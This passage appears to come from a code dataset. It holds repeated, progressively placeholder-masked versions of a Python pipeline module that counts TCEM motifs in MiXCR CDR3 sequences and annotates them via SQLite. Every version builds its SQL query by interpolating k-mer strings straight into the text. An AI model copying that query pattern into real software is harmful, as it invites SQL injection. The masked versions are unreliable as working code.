out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {\n 'tcem_annotations': 
self.get_target(f'annotated_tcem_repertoire', 'csv'),\n }\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"import luigi\nimport logging\nimport subprocess\nimport logging\nimport pandas as pd\nimport sqlite3\nfrom os.path import join, dirname, basename\nfrom .mixcr import MixcrClones\nfrom .tcem_aa_db import TcemNrAaDb\nfrom ....pipeline.utils.cap_task import CapTask\nfrom ....pipeline.config import PipelineConfig\nlogger = logging.getLogger('tcems')\n\n\ndef countit(objs):\n \"\"\"Return a dict with counts for each item in a list.\"\"\"\n out = {}\n for el in objs:\n out[el] = 1 + out.get(el, 0)\n out = {k: v for k, v in out.items()}\n return out\n\n\ndef get_binding_motifs(seq):\n \"\"\"Return a dict of dicts with counts for different TCEM motifs.\"\"\"\n out = {'type_1': [], 'type_2a': [], 'type_2b': []}\n for i in range(len(seq) - 9 + 1):\n kmer = seq[i:i + 9]\n out['type_1'].append(kmer[3:8])\n for i in range(len(seq) - 15 + 1):\n kmer = seq[i:i + 15]\n tail = kmer[5] + kmer[7] + kmer[9] + kmer[10]\n out['type_2a'].append(kmer[4] + tail)\n out['type_2b'].append(kmer[2] + tail)\n counted = {k: countit(v) for k, v in out.items()}\n return counted\n\n\ndef parse_mixcr_table(filepath):\n \"\"\"Return counts of TCEMs for a set of CDR3 sequences.\"\"\"\n tbl = pd.read_csv(filepath, sep='\\t')\n out = {}\n for _, row in tbl.iterrows():\n motifs = get_binding_motifs(row['aaSeqImputedCDR3'])\n for kind, motif_counts in motifs.items():\n for motif, count in motif_counts.items():\n for mykind in [kind, 'all_types']:\n key = mykind, motif\n if key not in out:\n out[key] = {'num_unique_seqs': 0, 'num_clones': 0,\n 'num_unique_occurences': 0,\n 'num_clonal_occurences': 0}\n out[key]['num_unique_seqs'] += 1\n out[key]['num_clones'] += row['cloneCount']\n out[key]['num_unique_occurences'] += count\n out[key]['num_clonal_occurences'] += count * row[\n 'cloneCount']\n return out\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n 
f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\nlogger = logging.getLogger('tcems')\n\n\ndef countit(objs):\n \"\"\"Return a dict with counts for each item in a list.\"\"\"\n out = {}\n for el in objs:\n out[el] = 1 + out.get(el, 0)\n out = {k: v for k, v in out.items()}\n return out\n\n\ndef get_binding_motifs(seq):\n \"\"\"Return a dict of dicts with counts for different TCEM motifs.\"\"\"\n out = {'type_1': [], 'type_2a': [], 'type_2b': []}\n for i in range(len(seq) - 9 + 1):\n kmer = seq[i:i + 9]\n out['type_1'].append(kmer[3:8])\n for i in range(len(seq) - 15 + 1):\n kmer = seq[i:i + 15]\n tail = kmer[5] + kmer[7] + kmer[9] + kmer[10]\n out['type_2a'].append(kmer[4] + tail)\n out['type_2b'].append(kmer[2] + tail)\n counted = {k: countit(v) for k, v in out.items()}\n return counted\n\n\ndef parse_mixcr_table(filepath):\n \"\"\"Return counts of TCEMs for a set of CDR3 sequences.\"\"\"\n tbl = pd.read_csv(filepath, sep='\\t')\n out = {}\n for _, row in tbl.iterrows():\n motifs = get_binding_motifs(row['aaSeqImputedCDR3'])\n for kind, motif_counts in motifs.items():\n for motif, count in motif_counts.items():\n for mykind in [kind, 'all_types']:\n key = mykind, motif\n if key not in out:\n out[key] = {'num_unique_seqs': 0, 'num_clones': 0,\n 'num_unique_occurences': 0,\n 'num_clonal_occurences': 0}\n out[key]['num_unique_seqs'] += 1\n out[key]['num_clones'] += row['cloneCount']\n out[key]['num_unique_occurences'] += count\n out[key]['num_clonal_occurences'] += count * row[\n 'cloneCount']\n return out\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 
1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n\n\ndef countit(objs):\n \"\"\"Return a dict with counts for each item in a list.\"\"\"\n out = {}\n for el in objs:\n out[el] = 1 + out.get(el, 0)\n out = {k: v for k, v in out.items()}\n return out\n\n\ndef get_binding_motifs(seq):\n \"\"\"Return a dict of dicts with counts for different TCEM motifs.\"\"\"\n out = {'type_1': [], 'type_2a': [], 'type_2b': []}\n for i in range(len(seq) - 9 + 1):\n kmer = seq[i:i + 9]\n out['type_1'].append(kmer[3:8])\n for i in range(len(seq) - 15 + 1):\n kmer = seq[i:i + 15]\n tail = kmer[5] + kmer[7] + kmer[9] + kmer[10]\n out['type_2a'].append(kmer[4] + tail)\n out['type_2b'].append(kmer[2] + tail)\n counted = {k: countit(v) for k, v in out.items()}\n return counted\n\n\ndef parse_mixcr_table(filepath):\n \"\"\"Return counts of TCEMs for a set of CDR3 sequences.\"\"\"\n tbl = pd.read_csv(filepath, sep='\\t')\n out = {}\n for _, row in tbl.iterrows():\n motifs = get_binding_motifs(row['aaSeqImputedCDR3'])\n for kind, motif_counts in motifs.items():\n for motif, count in motif_counts.items():\n for mykind in [kind, 'all_types']:\n key = mykind, motif\n if key not in out:\n out[key] = {'num_unique_seqs': 0, 'num_clones': 0,\n 'num_unique_occurences': 0,\n 'num_clonal_occurences': 0}\n out[key]['num_unique_seqs'] += 1\n out[key]['num_clones'] += row['cloneCount']\n out[key]['num_unique_occurences'] += count\n out[key]['num_clonal_occurences'] += count * row[\n 'cloneCount']\n return out\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = 
{}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n\n\ndef countit(objs):\n \"\"\"Return a dict with counts for each item in a list.\"\"\"\n out = {}\n for el in objs:\n out[el] = 1 + out.get(el, 0)\n out = {k: v for k, v in out.items()}\n return out\n\n\n<function token>\n\n\ndef parse_mixcr_table(filepath):\n \"\"\"Return counts of TCEMs for a set of CDR3 sequences.\"\"\"\n tbl = pd.read_csv(filepath, sep='\\t')\n out = {}\n for _, row in tbl.iterrows():\n motifs = get_binding_motifs(row['aaSeqImputedCDR3'])\n for kind, motif_counts in motifs.items():\n for motif, count in motif_counts.items():\n for mykind in [kind, 'all_types']:\n key = mykind, motif\n if key not in out:\n out[key] = {'num_unique_seqs': 0, 'num_clones': 0,\n 'num_unique_occurences': 0,\n 'num_clonal_occurences': 0}\n out[key]['num_unique_seqs'] += 1\n out[key]['num_clones'] += row['cloneCount']\n out[key]['num_unique_occurences'] += count\n out[key]['num_clonal_occurences'] += count * row[\n 'cloneCount']\n return out\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n\n\ndef countit(objs):\n \"\"\"Return a dict with counts for each item in a list.\"\"\"\n out = {}\n for el in objs:\n out[el] = 1 + out.get(el, 0)\n out = {k: v for k, v in out.items()}\n return out\n\n\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n <function token>\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {'tcem_counts': self.get_target(f'tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = 